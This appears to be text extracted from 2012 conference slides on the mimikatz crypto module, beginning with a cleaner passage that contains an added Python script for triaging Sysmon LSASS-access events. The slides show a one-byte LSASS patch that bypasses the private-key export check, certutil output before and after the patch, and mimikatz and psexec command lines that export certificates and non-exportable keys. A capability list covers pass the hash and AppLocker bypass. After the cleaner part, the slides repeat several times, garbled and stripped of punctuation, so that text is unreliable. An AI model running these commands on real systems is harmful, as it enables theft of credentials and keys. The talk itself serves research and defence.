mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates… even those that are exportable (huh?)
– certutil can…
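The privilege requirement above (debug privilege or SYSTEM) is there because the one-byte write needs a process handle on LSASS, a protected process, with write rights. The access mask granted on that handle is what host telemetry records, so the block below, an added example that is not code from the slides or from mimikatz, classifies process-access events against lsass.exe by the rights granted: write/inject (PROCESS_VM_WRITE, PROCESS_VM_OPERATION or PROCESS_CREATE_THREAD, the documented requirements of WriteProcessMemory and remote thread creation), read only (PROCESS_VM_READ), or query only. The event lines are constructed samples laid out like the fields of a Sysmon Event ID 10 (ProcessAccess) record; the `|` separator, the image paths and the masks are assumptions made for the sample, not real telemetry.

```python
"""
Added example, not code from the slides or from mimikatz: triage process
access to lsass.exe by the access mask the opener was granted.

Writing into LSASS needs a handle with PROCESS_VM_WRITE and
PROCESS_VM_OPERATION (WriteProcessMemory's documented requirements);
starting a remote thread needs PROCESS_CREATE_THREAD.  Reading memory
needs only PROCESS_VM_READ, and most legitimate openers need only the
query rights.  The event lines below are constructed samples shaped like
Sysmon Event ID 10 fields; they are not real telemetry.
"""

# Process access rights from winnt.h
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

RIGHT_NAMES = {
    PROCESS_CREATE_THREAD: "PROCESS_CREATE_THREAD",
    PROCESS_VM_OPERATION: "PROCESS_VM_OPERATION",
    PROCESS_VM_READ: "PROCESS_VM_READ",
    PROCESS_VM_WRITE: "PROCESS_VM_WRITE",
    PROCESS_QUERY_INFORMATION: "PROCESS_QUERY_INFORMATION",
    PROCESS_QUERY_LIMITED_INFORMATION: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Any of these on a handle to LSASS lets the holder change its memory or threads.
WRITE_OR_INJECT = PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD

SEVERITY = {"write/inject": 0, "read": 1, "query": 2}

# Constructed sample events: 'Key=Value' fields separated by '|' (assumed layout).
SAMPLE_EVENTS = [
    "EventID=10|SourceImage=C:\\Windows\\System32\\svchost.exe"
    "|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1000",
    "EventID=10|SourceImage=C:\\Users\\demo\\Desktop\\tool.exe"
    "|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1010",
    "EventID=10|SourceImage=C:\\Users\\demo\\Desktop\\tool.exe"
    "|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x143A",
    "EventID=10|SourceImage=C:\\Windows\\System32\\Taskmgr.exe"
    "|TargetImage=C:\\Windows\\explorer.exe|GrantedAccess=0x1FFFFF",
]


def parse_event(line: str) -> dict:
    """Split one 'Key=Value|Key=Value' line into a dict (first '=' splits)."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))


def describe_rights(granted: int) -> list:
    """Names of the known rights set in an access mask."""
    return [name for bit, name in RIGHT_NAMES.items() if granted & bit]


def classify_access(granted: int) -> str:
    """Rank a granted-access mask by what it lets the holder do to the target."""
    if granted & WRITE_OR_INJECT:
        return "write/inject"
    if granted & PROCESS_VM_READ:
        return "read"
    return "query"


def triage(lines) -> list:
    """Return (source image, granted mask, class) for every ProcessAccess
    event whose target is lsass.exe, most dangerous first."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") != "10":
            continue
        if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        granted = int(event["GrantedAccess"], 16)
        findings.append((event["SourceImage"], granted, classify_access(granted)))
    findings.sort(key=lambda f: SEVERITY[f[2]])  # stable: keeps event order within a class
    return findings


if __name__ == "__main__":
    for source, granted, kind in triage(SAMPLE_EVENTS):
        print(f"{kind:<13} {granted:#06x} {source}  {describe_rights(granted)}")
```

The write/inject class is the one to alert on: a handle with those rights on LSASS from anything other than a known security product is rare on a healthy host, and it is the only class that can produce the in-memory change the slides describe. Read-only handles deserve a look too, but they are much noisier.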
mimikatz crypto / patchcng: bonus (slide 52)
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
Before the patch (certutil refuses the export):
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach cert (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX : ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
After crypto::patchcng (same command, same key):
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach cert (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX : La commande s'est terminée correctement.
mimikatz crypto / memo (slide 53)
Some commands:
mimikatz # crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz # privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz crypto / what we can do (slide 54)
Exactly the same as for sekurlsa: prevent access to the accounts/computer – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy :)
mimikatz / what else can it do? (slide 55)
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz / that's all folks (slide 56)
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy :)
especially if you have written the corresponding slide number
Blog, Source Code & Contact (slide 57)
blog: http://blog.gentilkiwi.com/mimikatz
source: http://blog.gentilkiwi.com/mimikatz/source, https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
